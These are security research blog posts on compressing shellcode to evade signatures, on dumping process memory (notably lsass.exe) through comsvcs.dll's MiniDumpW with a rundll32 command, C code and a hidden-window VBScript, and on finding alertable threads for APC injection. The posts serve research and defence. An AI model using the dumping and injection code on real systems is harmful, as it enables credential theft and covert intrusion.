Shellcode: Data Compression

Introduction

This post examines data compression algorithms suitable for position-independent codes and assumes you’re already familiar with the concept and purpose of data compression. For those of you curious to know more about the science, or information theory, read Data Compression Explained by Matt Mahoney. For historical perspective, read History of Lossless Data Compression Algorithms. Charles Bloom has a great blog on the subject that goes way over my head. For questions and discussions, Encode’s Forum is popular among experts and should be able to help with any queries you have.

For shellcode, algorithms based on the following conditions are considered:

  1. Compact decompressor.
  2. Good compression ratio.
  3. Portable across operating systems and architectures.
  4. Difficult to detect by signature.
  5. Unencumbered by patents and licensing.

Meeting the requirements isn’t that easy. Search for “lightweight compression algorithms” and you’ll soon find recommendations for algorithms that aren’t compact at all. It’s not an issue on machines with 1TB hard drives of course. It’s a problem for resource-constrained environments like microcontrollers and wireless sensors. The best algorithms are usually optimized for speed. They contain arrays and constants that allow them to be easily identified with signature-based tools.

Algorithms that are compact might have suboptimal compression ratios. The compressor component is closed source or restricted by licensing. There is light at the end of the tunnel, however, thanks primarily to the efforts of those designing executable compression. First, we look at those algorithms and then what Windows API can be used as an alternative. There are open source libraries designed for interoperability that support Windows compression on other platforms like Linux.

Table of contents

  1. Executable Compression
  2. Windows NT Layer DLL
  3. Windows Compression API
  4. Windows Packaging API
  5. Windows Imaging API
  6. Direct3D HLSL Compiler
  7. Windows-internal libarchive library
  8. LibreSSL Cryptography Library
  9. Windows.Storage.Compression
  10. Windows Undocumented API
  11. Summary

1. Executable Compression

The first tool known to compress executables and save disk space was Realia SpaceMaker published sometime in 1982 by Robert Dewar. The first virus known to use compression in its infection routine was Cruncher published in June 1993. The author of Cruncher used routines from the disk reduction utility for DOS called DIET. Later on, many different viruses utilized compression as part of their infection routine to reduce the size of infected files, presumably to help evade detection longer. Although completely unrelated to shellcode, I decided to look at e-zines from twenty years ago when there was a lot of interest in using lightweight compression algorithms.

The following list of viruses used compression back in the late 90s/early 00s. It’s not an extensive list, as I only searched the more popular e-zines like 29A and Xine by iKX.

  • Redemption, by Jacky Qwerty/29A
  • Inca, Hybris, by Vecna/29A
  • Aldebaran, by Bozo/iKX
  • Legacy, Thorin, Rhapsody, Forever, by Billy Belcebu/iKX
  • BeGemot, HIV, Vulcano, Benny, Milennium, by Benny/29A
  • Junkmail, Junkhtmail, by roy g biv/29A/defjam

The following compression engines were examined. A 1MB EXE file was used as the raw data and not all of them were tested.

BCE that appeared in 29a#4 was disappointing with only an 8% compression ratio. BNCE that appeared in DCA#1 was no better at 9%, although the decompressor is only 54 bytes. The decompressor for LSCE is 25 bytes, but the compressor simply encodes repeated sequences of zero and nothing else. JQCoding has a ~20% compression ratio while LZCE provides the best at 36%. With exception to the last two mentioned, I was unable to find anything in the e-zines with a good compression ratio. They were super tiny, but also super eh..inefficient. Worth a mention is KITTY, by snowcat.

While I could be wrong, the earliest example of compression being used to unpack shellcode can be found in a generator written by Z0MBiE/29A in 2004. (shown in figure 1). NRV compression algorithms, similar to what’s used in UPX, were re-purposed to decompress the shellcode (see freenrv2 for more details).

Figure 1: Shellcode constructor by Z0MBiE/29A

UPX is a very popular tool for executable compression based on UCL. Included with the source is a PE packer example called UCLpack (thanks Peter) which is ideal for shellcode, too. aPLib also provides good compression ratio and the decompressor doesn’t contain lots of unique constants that would assist in detection by signature. The problem is that the compressor isn’t open source and requires linking with static or dynamic libraries compiled by the author. Thankfully, an open-source implementation by Emmanuel Marty is available and this is also ideal for shellcode.

Other libraries worth mentioning that I didn’t think were entirely suitable are Tiny Inflate and uzlib. The rest of this post focuses on compression provided by various Windows API.

2. Windows NT Layer DLL

Used by the Sofacy group to decompress a payload, RtlDecompressBuffer is also popular for PE Packers and in-memory execution. rtlcompress.c demonstrates using the API.

  • Compression

Obtain the size of the workspace required for compression via the RtlGetCompressionWorkSpaceSize API. Allocate memory for the compressed data and pass both memory buffer and the raw data to RtlCompressBuffer. The following example in C demonstrates this.

DWORD CompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {      
    ULONG                            wspace, fspace;
    SIZE_T                           outlen;
    DWORD                            len;
    NTSTATUS                         nts;
    PVOID                            ws, outbuf;
    HMODULE                          m;
    RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
    RtlCompressBuffer_t              RtlCompressBuffer;
      
    m = GetModuleHandle("ntdll");
    RtlGetCompressionWorkSpaceSize = (RtlGetCompressionWorkSpaceSize_t)GetProcAddress(m, "RtlGetCompressionWorkSpaceSize");
    RtlCompressBuffer              = (RtlCompressBuffer_t)GetProcAddress(m, "RtlCompressBuffer");
        
    if(RtlGetCompressionWorkSpaceSize == NULL || RtlCompressBuffer == NULL) {
      printf("Unable to resolve RTL API\n");
      return 0;
    }
        
    // 1. obtain the size of workspace
    nts = RtlGetCompressionWorkSpaceSize(
      engine | COMPRESSION_ENGINE_MAXIMUM, 
      &wspace, &fspace);
          
    if(nts == 0) {
      // 2. allocate memory for workspace
      ws = malloc(wspace); 
      if(ws != NULL) {
        // 3. allocate memory for output 
        outbuf = malloc(inlen);
        if(outbuf != NULL) {
          // 4. compress data
          nts = RtlCompressBuffer(
            engine | COMPRESSION_ENGINE_MAXIMUM, 
            inbuf, inlen, outbuf, inlen, 0, 
            (PULONG)&outlen, ws); 
              
          if(nts == 0) {
            // 5. write the original length
            WriteFile(outfile, &inlen, sizeof(DWORD), &len, 0);
            // 6. write compressed data to file
            WriteFile(outfile, outbuf, outlen, &len, 0);
          }
          // 7. free output buffer
          free(outbuf);
        }
        // 8. free workspace
        free(ws);
      }
    }
    return outlen;
}
  • Decompression

LZNT1 and Xpress data can be unpacked using RtlDecompressBuffer, however, Xpress Huffman data can only be unpacked using RtlDecompressBufferEx or the multi-threaded RtlDecompressBufferEx2. The last two require a WorkSpace buffer.

    typedef NTSTATUS (WINAPI *RtlDecompressBufferEx_t)(
      USHORT                 CompressionFormatAndEngine,
      PUCHAR                 UncompressedBuffer,
      ULONG                  UncompressedBufferSize,
      PUCHAR                 CompressedBuffer,
      ULONG                  CompressedBufferSize,
      PULONG                 FinalUncompressedSize,
      PVOID                  WorkSpace);
      
DWORD DecompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    ULONG                            wspace, fspace;
    SIZE_T                           outlen = 0;
    DWORD                            len;
    NTSTATUS                         nts;
    PVOID                            ws, outbuf;
    HMODULE                          m;
    RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
    RtlDecompressBufferEx_t          RtlDecompressBufferEx;
      
    m = GetModuleHandle("ntdll");
    RtlGetCompressionWorkSpaceSize = (RtlGetCompressionWorkSpaceSize_t)GetProcAddress(m, "RtlGetCompressionWorkSpaceSize");
    RtlDecompressBufferEx          = (RtlDecompressBufferEx_t)GetProcAddress(m, "RtlDecompressBufferEx");
        
    if(RtlGetCompressionWorkSpaceSize == NULL || RtlDecompressBufferEx == NULL) {
      printf("Unable to resolve RTL API\n");
      return 0;
    }
        
    // 1. obtain the size of workspace
    nts = RtlGetCompressionWorkSpaceSize(
      engine | COMPRESSION_ENGINE_MAXIMUM, 
      &wspace, &fspace);
          
    if(nts == 0) {
      // 2. allocate memory for workspace
      ws = malloc(wspace); 
      if(ws != NULL) {
        // 3. allocate memory for output
        outlen = *(DWORD*)inbuf;
        outbuf = malloc(outlen);
        
        if(outbuf != NULL) {
          // 4. decompress data
          nts = RtlDecompressBufferEx(
            engine | COMPRESSION_ENGINE_MAXIMUM, 
            outbuf, outlen, 
            (PBYTE)inbuf + sizeof(DWORD), inlen - sizeof(DWORD), 
            (PULONG)&outlen, ws); 
              
          if(nts == 0) {
            // 5. write decompressed data to file
            WriteFile(outfile, outbuf, outlen, &len, 0);
          } else {
            printf("RtlDecompressBufferEx failed with %08lx\n", nts);
          }
          // 6. free output buffer
          free(outbuf);
        } else {
          printf("malloc() failed\n");
        }
        // 7. free workspace
        free(ws);
      }
    }
    return outlen;
}

3. Windows Compression API

Despite being well documented and offering better compression ratios than RtlCompressBuffer, it’s unusual to see these API used at all. Four engines are supported: MSZIP, Xpress, Xpress Huffman and LZMS. To demonstrate using these API, see xpress.c

Compression

DWORD CompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    COMPRESSOR_HANDLE ch = NULL;
    BOOL              r;
    SIZE_T            outlen, len;
    LPVOID            outbuf;
    DWORD             wr;
    
    // Create a compressor
    r = CreateCompressor(engine, NULL, &ch);
    
    if(r) {    
      // Query compressed buffer size.
      Compress(ch, inbuf, inlen, NULL, 0, &len);      
      if(GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
        // allocate memory for compressed data
        outbuf = malloc(len);
        if(outbuf != NULL) {
          // Compress data and write data to outbuf.
          r = Compress(ch, inbuf, inlen, outbuf, len, &outlen);
          // if compressed ok, write to file
          if(r) {
            WriteFile(outfile, outbuf, outlen, &wr, NULL);
          } else xstrerror("Compress()");
          free(outbuf);
        } else xstrerror("malloc()");
      } else xstrerror("Compress()");
      CloseCompressor(ch);
    } else xstrerror("CreateCompressor()");
    return r;
}

Decompression

DWORD DecompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    DECOMPRESSOR_HANDLE dh = NULL;
    BOOL                r;
    SIZE_T              outlen, len;
    LPVOID              outbuf;
    DWORD               wr;
    
    // Create a decompressor
    r = CreateDecompressor(engine, NULL, &dh);
    
    if(r) {    
      // Query Decompressed buffer size.
      Decompress(dh, inbuf, inlen, NULL, 0, &len);      
      if(GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
        // allocate memory for decompressed data
        outbuf = malloc(len);
        if(outbuf != NULL) {
          // Decompress data and write data to outbuf.
          r = Decompress(dh, inbuf, inlen, outbuf, len, &outlen);
          // if decompressed ok, write to file
          if(r) {
            WriteFile(outfile, outbuf, outlen, &wr, NULL);
          } else xstrerror("Decompress()");
          free(outbuf);
        } else xstrerror("malloc()");
      } else xstrerror("Decompress()");
      CloseDecompressor(dh);
    } else xstrerror("CreateDecompressor()");
    return r;
}

4. Windows Packaging API

If you’re a developer that wants to sell a Windows application to customers on the Microsoft Store, you must submit a package that uses the Open Packaging Conventions (OPC) format. Visual Studio automates building packages (.msix or .appx) and bundles (.msixbundle or .appxbundle). There’s also a well documented interface (IAppxFactory) that allows building them manually. While not intended to be used specifically for compression, there’s no reason why you can’t. An SDK sample to extract the contents of packages uses SHCreateStreamOnFileEx to read the package from disk. However, you can also use SHCreateMemStream and decompress a package entirely in memory.

5. Windows Imaging API (WIM)

These encode and decode .wim files on disk. WIMCreateFile internally calls CreateFile to return a file handle to an archive that’s then used with WIMCaptureImage to compress and add files to the archive. From what I can tell, there’s no way to work with .wim files in memory using these API.

For Linux, the Windows Imaging (WIM) library supports Xpress, LZX and LZMS algorithms. libmspack and this repo provide good information on the various compression algorithms supported by Windows.

6. Direct3D HLSL Compiler

Believe it or not, the best compression ratio on Windows is provided by the Direct3D API. Internally, they use the DXT/Block Compression (BC) algorithms, which are designed specifically for textures/images. The algorithms provide higher quality compression rates than anything else available on Windows. The compression ratio was 60% for a 1MB EXE file and using the API is very easy. The following example in C uses D3DCompressShaders and D3DDecompressShaders. While untested, I believe OpenGL API could likely be used in a similar way.

Compression

#pragma comment(lib, "D3DCompiler.lib")
#include <d3dcompiler.h>
uint32_t d3d_compress(const void *inbuf, uint32_t inlen) {
    
    D3D_SHADER_DATA dsa;
    HRESULT         hr;
    ID3DBlob        *blob;
    SIZE_T          outlen = 0;
    LPVOID          outbuf;
    HANDLE          file;
    DWORD           len;
    
    file = CreateFile("compressed.bin", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if(file == INVALID_HANDLE_VALUE) return 0;
    
    dsa.pBytecode      = inbuf;
    dsa.BytecodeLength = inlen;
    
    // compress data
    hr = D3DCompressShaders(1, &dsa, D3D_COMPRESS_SHADER_KEEP_ALL_PARTS, &blob);
    if(hr == S_OK) {
      // write to file
      outlen = blob->lpVtbl->GetBufferSize(blob);
      outbuf = blob->lpVtbl->GetBufferPointer(blob);
      
      WriteFile(file, outbuf, outlen, &len, 0);
      blob->lpVtbl->Release(blob);
    }
    CloseHandle(file);
    return outlen;
}

Decompression

uint32_t d3d_decompress(const void *inbuf, uint32_t inlen) {
    D3D_SHADER_DATA dsa;
    HRESULT         hr;
    ID3DBlob        *blob;
    SIZE_T          outlen = 0;
    LPVOID          outbuf;
    HANDLE          file;
    DWORD           len;
    
    // create file to save decompressed data to
    file = CreateFile("decompressed.bin", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if(file == INVALID_HANDLE_VALUE) return 0;
    
    dsa.pBytecode      = inbuf;
    dsa.BytecodeLength = inlen;
    
    // decompress buffer
    hr = D3DDecompressShaders(inbuf, inlen, 1, 0, 0, 0, &blob, NULL);
    if(hr == S_OK) {
      // write to file
      outlen = blob->lpVtbl->GetBufferSize(blob);
      outbuf = blob->lpVtbl->GetBufferPointer(blob);
      
      WriteFile(file, outbuf, outlen, &len, 0);
      blob->lpVtbl->Release(blob);
    }
    CloseHandle(file);
    return outlen;    
}

The main problem with dynamically resolving these API is knowing what version is installed. The file name on my Windows 10 system is “D3DCompiler_47.dll”. It will likely be different on legacy systems.

7. Windows-internal libarchive library

Since the release of Windows 10 build 17063, the tape archiving tool ‘bsdtar’ is available and uses a stripped down version of the open source Multi-format archive and compression library to create and extract compressed files both in memory and on disk. The version found on windows supports bzip2, compress and gzip formats. Although, bsdtar shows support for xz and lzma, at least on my system along with lzip, they appear to be unsupported.

8. LibreSSL Cryptography Library

Windows 10 Fall Creators Update and Windows Server 1709 include support for an OpenSSH client and server. The crypto library used by this port appears to have been compiled from the LibreSSL project, and if available can be found in C:\Windows\System32\libcrypto.dll. As some of you know, Transport Layer Security (TLS) supports compression prior to encryption. LibreSSL supports the ZLib and RLE methods, so it’s entirely possible to use COMP_compress_block and COMP_expand_block to compress and decompress raw data in memory.

9. Windows.Storage.Compression

This namespace located in Windows.Storage.Compress.dll internally uses Windows Compression API. CreateCompressor is invoked with the COMPRESS_RAW flag set. It also invokes SetCompressorInformation with COMPRESS_INFORMATION_CLASS_BLOCK_SIZE flag if the user specifies one in the Compressor method.

10. Windows Undocumented API

DLLs on Windows use the DEFLATE algorithm extensively to support various audio, video, image encoders/decoders and file archives. Normally, the deflate routines are used internally and can’t be resolved dynamically via GetProcAddress. However, between at least Windows 7 and 10 is a DLL called PresentationNative_v0300.dll that can be found in the C:\Windows\System32 directory. (There may also be PresentationNative_v0400.dll, but I haven’t investigated this thoroughly enough.) Four public symbols grabbed my attention, which are ums_deflate_init, ums_deflate, ums_inflate_init and ums_inflate. For a PoC demonstrating how to use them, see winflate.c

Compression

The following code uses zlib.h to compress a buffer and write to file.

DWORD CompressBuffer(LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    SIZE_T             outlen, len;
    LPVOID             outbuf;
    DWORD              wr;
    HMODULE            m;
    z_stream           ds;
    ums_deflate_t      ums_deflate;
    ums_deflate_init_t ums_deflate_init;
    int                err;
    
    m = LoadLibrary("PresentationNative_v0300.dll");
    ums_deflate_init = (ums_deflate_init_t)GetProcAddress(m, "ums_deflate_init");
    ums_deflate      = (ums_deflate_t)GetProcAddress(m, "ums_deflate");
    
    if(ums_deflate_init == NULL || ums_deflate == NULL) {
      printf("  [ unable to resolve deflate API.\n");
      return 0;
    }
    // allocate memory for compressed data
    outbuf = malloc(inlen);
    if(outbuf != NULL) {
      // Compress data and write data to outbuf.
      ds.zalloc    = Z_NULL;
      ds.zfree     = Z_NULL;
      ds.opaque    = Z_NULL;
      ds.avail_in  = (uInt)inlen;       // size of input
      ds.next_in   = (Bytef *)inbuf;    // input buffer
      ds.avail_out = (uInt)inlen;       // size of output buffer
      ds.next_out  = (Bytef *)outbuf;   // output buffer
      
      if(ums_deflate_init(&ds, Z_BEST_COMPRESSION, "1", sizeof(ds)) == Z_OK) {
        if((err = ums_deflate(&ds, Z_FINISH)) == Z_STREAM_END) {
          // write the original length first
          WriteFile(outfile, &inlen, sizeof(DWORD), &wr, NULL);
          // then the data
          WriteFile(outfile, outbuf, ds.avail_out, &wr, NULL);
          FlushFileBuffers(outfile);
        } else {
          printf("  [ ums_deflate() : %x\n", err);
        }
      } else {
        printf("  [ ums_deflate_init()\n");
      }
      free(outbuf);
    }
    return 0;
}

Decompression

Inflating/decompressing the data is based on an example using zlib.

DWORD DecompressBuffer(LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    SIZE_T             outlen, len;
    LPVOID             outbuf;
    DWORD              wr;
    HMODULE            m;
    z_stream           ds;
    ums_inflate_t      ums_inflate;
    ums_inflate_init_t ums_inflate_init;
    
    m = LoadLibrary("PresentationNative_v0300.dll");
    ums_inflate_init = (ums_inflate_init_t)GetProcAddress(m, "ums_inflate_init");
    ums_inflate      = (ums_inflate_t)GetProcAddress(m, "ums_inflate");
    
    if(ums_inflate_init == NULL || ums_inflate == NULL) {
      printf("  [ unable to resolve inflate API.\n");
      return 0;
    }
    // allocate memory for decompressed data
    outlen = *(DWORD*)inbuf;
    outbuf = malloc(outlen*2);
    
    if(outbuf != NULL) {
      // decompress data and write data to outbuf.
      ds.zalloc    = Z_NULL;
      ds.zfree     = Z_NULL;
      ds.opaque    = Z_NULL;
      ds.avail_in  = (uInt)inlen - 8;       // size of input
      ds.next_in   = (Bytef*)inbuf + 4;     // input buffer
      ds.avail_out = (uInt)outlen*2;        // size of output buffer
      ds.next_out  = (Bytef*)outbuf;        // output buffer
      
      printf("  [ initializing inflate...\n");
      if(ums_inflate_init(&ds, "1", sizeof(ds)) == Z_OK) {
        printf("  [ inflating...\n");
        if(ums_inflate(&ds, Z_FINISH) == Z_STREAM_END) {
          WriteFile(outfile, outbuf, ds.avail_out, &wr, NULL);
          FlushFileBuffers(outfile);
        } else {
          printf("  [ ums_inflate()\n");
        }
      } else {
        printf("  [ ums_inflate_init()\n");
      }
      free(outbuf);
    } else {
      printf("  [ malloc()\n");
    }
    return 0;
}

11. Summary/Results

That sums up the algorithms I think are suitable for a shellcode. For the moment, UCL and apultra seem to provide the best solution. Using Windows API is a good option. They are also susceptible to monitoring and may not be portable. One area I didn’t cover due to time is Media Foundation API. It may be possible to use audio, video and image encoders to compress raw data and the decoders to decompress. Worth researching?

Library / API Algorithm / Engine Compression Ratio
RtlCompressBuffer LZNT1 39%
RtlCompressBuffer Xpress 47%
RtlCompressBuffer Xpress Huffman 53%
Compress MSZIP 55%
Compress Xpress 40%
Compress Xpress Huffman 48%
Compress LZMS 58%
D3DCompressShaders DXT/BC 60%
aPLib N/A 45%
UCL N/A 42%
Undocumented API DEFLATE 46%
Posted in assembly, compression, linux, malware, programming, security, shellcode, windows | Tagged , , , , | 1 Comment

MiniDumpWriteDump via COM+ Services DLL

Introduction

This will be a very quick code-oriented post about a DLL function exported by comsvcs.dll that I was unable to find any reference to online.

UPDATE: Memory Dump Analysis Anthology Volume 1 that was published in 2008 by Dmitry Vostokov, discusses this function in a chapter on COM+ Crash Dumps. The reason I didn’t find it before is because I was searching for “MiniDumpW” and not “MiniDump”.

While searching for DLL/EXE that imported DBGHELP!MiniDumpWriteDump, I discovered comsvcs.dll exports a function called MiniDumpW which appears to have been designed specifically for use by rundll32. It will accept three parameters but the first two are ignored. The third parameter should be a UNICODE string combining three tokens/parameters wrapped in quotation marks. The first is the process id, the second is where to save the memory dump and third requires the keyword “full” even though there’s no alternative for this last parameter.

To use from the command line, type the following: "rundll32 C:\windows\system32\comsvcs.dll MiniDump "1234 dump.bin full"" where “1234” is the target process to dump. Obviously, this assumes you have permission to query and read the memory of target process. If COMSVCS!MiniDumpW encounters an error, it simply calls KERNEL32!ExitProcess and you won’t see anything. The following code in C demonstrates how to invoke it dynamically.

BTW, HRESULT is probably the wrong return type. Internally it exits the process with E_INVALIDARG if it encounters a problem with the parameters, but if it succeeds, it returns 1. S_OK is defined as 0.

#define UNICODE
#include <windows.h>
#include <stdio.h>

typedef HRESULT (WINAPI *_MiniDumpW)(
  DWORD arg1, DWORD arg2, PWCHAR cmdline);
  
typedef NTSTATUS (WINAPI *_RtlAdjustPrivilege)(
  ULONG Privilege, BOOL Enable, 
  BOOL CurrentThread, PULONG Enabled);

// "<pid> <dump.bin> full"
int wmain(int argc, wchar_t *argv[]) {
    HRESULT             hr;
    _MiniDumpW          MiniDumpW;
    _RtlAdjustPrivilege RtlAdjustPrivilege;
    ULONG               t;
    
    MiniDumpW          = (_MiniDumpW)GetProcAddress(
      LoadLibrary(L"comsvcs.dll"), "MiniDumpW");
      
    RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(
      GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege");
    
    if(MiniDumpW == NULL) {
      printf("Unable to resolve COMSVCS!MiniDumpW.\n");
      return 0;
    }
    // try enable debug privilege
    RtlAdjustPrivilege(20, TRUE, FALSE, &t);
        
    printf("Invoking COMSVCS!MiniDumpW(\"%ws\")\n", argv[1]);
   
    // dump process
    MiniDumpW(0, 0,  argv[1]);
    printf("OK!\n");
    
    return 0;
}

Since neither rundll32 nor comsvcs!MiniDumpW will enable the debugging privilege required to access lsass.exe, the following VBscript will work in an elevated process.

Option Explicit

Const SW_HIDE = 0

If (WScript.Arguments.Count <> 1) Then
    WScript.StdOut.WriteLine("procdump - Copyright (c) 2019 odzhan")
    WScript.StdOut.WriteLine("Usage: procdump <process>")
    WScript.Quit
Else
    Dim fso, svc, list, proc, startup, cfg, pid, str, cmd, query, dmp
    
    ' get process id or name
    pid = WScript.Arguments(0)
    
    ' connect with debug privilege
    Set fso  = CreateObject("Scripting.FileSystemObject")
    Set svc  = GetObject("WINMGMTS:{impersonationLevel=impersonate, (Debug)}")
    
    ' if not a number
    If(Not IsNumeric(pid)) Then
      query = "Name"
    Else
      query = "ProcessId"
    End If
    
    ' try find it
    Set list = svc.ExecQuery("SELECT * From Win32_Process Where " & _
      query & " = '" & pid & "'")
    
    If (list.Count = 0) Then
      WScript.StdOut.WriteLine("Can't find active process : " & pid)
      WScript.Quit()
    End If

    For Each proc in list
      pid = proc.ProcessId
      str = proc.Name
      Exit For
    Next

    dmp = fso.GetBaseName(str) & ".bin"
    
    ' if dump file already exists, try to remove it
    If(fso.FileExists(dmp)) Then
      WScript.StdOut.WriteLine("Removing " & dmp)
      fso.DeleteFile(dmp)
    End If
    
    WScript.StdOut.WriteLine("Attempting to dump memory from " & _
      str & ":" & pid & " to " & dmp)
    
    Set proc       = svc.Get("Win32_Process")
    Set startup    = svc.Get("Win32_ProcessStartup")
    Set cfg        = startup.SpawnInstance_
    cfg.ShowWindow = SW_HIDE

    cmd = "rundll32 C:\windows\system32\comsvcs.dll, MiniDump " & _
          pid & " " & fso.GetAbsolutePathName(".") & "\" & _
          dmp & " full"
    
    Call proc.Create (cmd, null, cfg, pid)
    
    ' sleep for a second
    Wscript.Sleep(1000)
    
    If(fso.FileExists(dmp)) Then
      WScript.StdOut.WriteLine("Memory saved to " & dmp)
    Else
      WScript.StdOut.WriteLine("Something went wrong.")
    End If
End If

Run from elevated cmd prompt.

No idea how useful this could be, but since it’s part of the operating system, it’s probably worth knowing anyway. Perhaps you will find similar functions in signed binaries that perform memory dumping of a target process. 🙂

Posted in windows | Tagged , , , | 1 Comment

Windows Process Injection: Asynchronous Procedure Call (APC)

Introduction

An early example of APC injection can be found in a 2005 paper by the late Barnaby Jack called Remote Windows Kernel Exploitation – Step into the Ring 0. Until now, these posts have focused on relatively new, lesser-known injection techniques. A factor in not covering APC injection before is the lack of a single user-mode API to identify alertable threads. Many have asked “how to identify an alertable thread” and were given an answer that didn’t work or were told it’s not possible. This post will examine two methods that both use a combination of user-mode API to identify them. The first was described in 2016 and the second was suggested earlier this month at Blackhat and Defcon.

Alertable Threads

A number of Windows API and the underlying system calls support asynchronous operations and specifically I/O completion routines.. A boolean parameter tells the kernel a calling thread should be alertable, so I/O completion routines for overlapped operations can still run in the background while waiting for some other event to become signalled. Completion routines or callback functions are placed in the APC queue and executed by the kernel via NTDLL!KiUserApcDispatcher. The following Win32 API can set threads to alertable.

A few others rarely mentioned involve working with files or named pipes that might be read or written to using overlapped operations. e.g ReadFile.

Unfortunately, there’s no single user-mode API to determine if a thread is alertable. From the kernel, the KTHREAD structure has an Alertable bit, but from user-mode there’s nothing similar, at least not that I’m aware of.

Method 1

First described and used by Tal Liberman in a technique he invented called AtomBombing.

…create an event for each thread in the target process, then ask each thread to set its corresponding event. … wait on the event handles, until one is triggered. The thread whose corresponding event was triggered is an alertable thread.

Based on this description, we take the following steps:

  1. Enumerate threads in a target process using Thread32First and Thread32Next. OpenThread and save the handle to an array not exceeding MAXIMUM_WAIT_OBJECTS.
  2. CreateEvent for each thread and DuplicateHandle for the target process.
  3. QueueUserAPC for each thread that will execute SetEvent on the handle duplicated in step 2.
  4. WaitForMultipleObjects until one of the event handles becomes signalled.
  5. The first event signalled is from an alertable thread.

MAXIMUM_WAIT_OBJECTS is defined as 64 which might seem like a limitation, but how likely is it for processes to have more than 64 threads and not one alertable?

HANDLE find_alertable_thread1(HANDLE hp, DWORD pid) {
    DWORD         i, cnt = 0;
    HANDLE        evt[2], ss, ht, h = NULL, 
      hl[MAXIMUM_WAIT_OBJECTS],
      sh[MAXIMUM_WAIT_OBJECTS],
      th[MAXIMUM_WAIT_OBJECTS];
    THREADENTRY32 te;
    HMODULE       m;
    LPVOID        f, rm;
    
    // 1. Enumerate threads in target process
    ss = CreateToolhelp32Snapshot(
      TH32CS_SNAPTHREAD, 0);
      
    if(ss == INVALID_HANDLE_VALUE) return NULL;

    te.dwSize = sizeof(THREADENTRY32);
    
    if(Thread32First(ss, &te)) {
      do {
        // if not our target process, skip it
        if(te.th32OwnerProcessID != pid) continue;
        // if we can't open thread, skip it
        ht = OpenThread(
          THREAD_ALL_ACCESS, 
          FALSE, 
          te.th32ThreadID);
          
        if(ht == NULL) continue;
        // otherwise, add to list
        hl[cnt++] = ht;
        // if we've reached MAXIMUM_WAIT_OBJECTS. break
        if(cnt == MAXIMUM_WAIT_OBJECTS) break;
      } while(Thread32Next(ss, &te));
    }

    // Resolve address of SetEvent
    m  = GetModuleHandle(L"kernel32.dll");
    f  = GetProcAddress(m, "SetEvent");
    
    for(i=0; i<cnt; i++) {
      // 2. create event and duplicate in target process
      sh[i] = CreateEvent(NULL, FALSE, FALSE, NULL);
      
      DuplicateHandle(
        GetCurrentProcess(),  // source process
        sh[i],                // source handle to duplicate
        hp,                   // target process
        &th[i],               // target handle
        0, 
        FALSE, 
        DUPLICATE_SAME_ACCESS);
        
      // 3. Queue APC for thread passing target event handle
      QueueUserAPC(f, hl[i], (ULONG_PTR)th[i]);
    }

    // 4. Wait for event to become signalled
    i = WaitForMultipleObjects(cnt, sh, FALSE, 1000);
    if(i != WAIT_TIMEOUT) {
      // 5. save thread handle
      h = hl[i];
    }
    
    // 6. Close source + target handles
    for(i=0; i<cnt; i++) {
      CloseHandle(sh[i]);
      CloseHandle(th[i]);
      if(hl[i] != h) CloseHandle(hl[i]);
    }
    CloseHandle(ss);
    return h;
}

Method 2

At Blackhat and Defcon 2019, Itzik Kotler and Amit Klein presented Process Injection Techniques – Gotta Catch Them All. They suggested alertable threads can be detected by simply reading the context of a remote thread and examining the control and integer registers. There’s currently no code in their pinjectra tool to perform this, so I decided to investigate how it might be implemented in practice.

If you look at the disassembly of KERNELBASE!SleepEx on Windows 10 (shown in figure 1), you can see it invokes the NT system call, NTDLL!ZwDelayExecution.

Figure 1. Disassembly of SleepEx on Windows 10.

The system call wrapper (shown in figure 2) executes a syscall instruction which transfers control from user-mode to kernel-mode. If we read the context of a thread that called KERNELBASE!SleepEx, the program counter (Rip on AMD64) should point to NTDLL!ZwDelayExecution + 0x14 which is the address of the RETN opcode.

Figure 2. Disassembly of NTDLL!ZwDelayExecution on Windows 10.

This address can be used to determine if a thread has called KERNELBASE!SleepEx. To calculate it, we have two options. Add a hardcoded offset to the address returned by GetProcAddress for NTDLL!ZwDelayExecution or read the program counter after calling KERNELBASE!SleepEx from our own artificial thread.

For the second option, a simple application was written to run a thread and call asynchronous APIs with alertable parameter set to TRUE. In between each invocation, GetThreadContext is used to read the program counter (Rip on AMD64) which will hold the return address after the system call has completed. This address can then be used in the first step of detection. Figure 3 shows output of this.

Figure 3. Win32 API and NT System Call Wrappers.

The following table matches Win32 APIs with NT system call wrappers. The parameters are included for reference.

Win32 API NT System Call
SleepEx ZwDelayExecution(BOOLEAN Alertable, PLARGE_INTEGER DelayInterval);
WaitForSingleObjectEx
GetOverlappedResultEx
ZwWaitForSingleObject(HANDLE Handle, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
WaitForMultipleObjectsEx
WSAWaitForMultipleEvents
NtWaitForMultipleObjects(ULONG ObjectCount, PHANDLE ObjectsArray, OBJECT_WAIT_TYPE WaitType, DWORD Timeout, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
SignalObjectAndWait NtSignalAndWaitForSingleObject(HANDLE SignalHandle, HANDLE WaitHandle, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
MsgWaitForMultipleObjectsEx NtUserMsgWaitForMultipleObjectsEx(ULONG ObjectCount, PHANDLE ObjectsArray, DWORD Timeout, DWORD WakeMask, DWORD Flags);
GetQueuedCompletionStatusEx NtRemoveIoCompletionEx(HANDLE Port, FILE_IO_COMPLETION_INFORMATION *Info, ULONG Count, ULONG *Written, LARGE_INTEGER *Timeout, BOOLEAN Alertable);

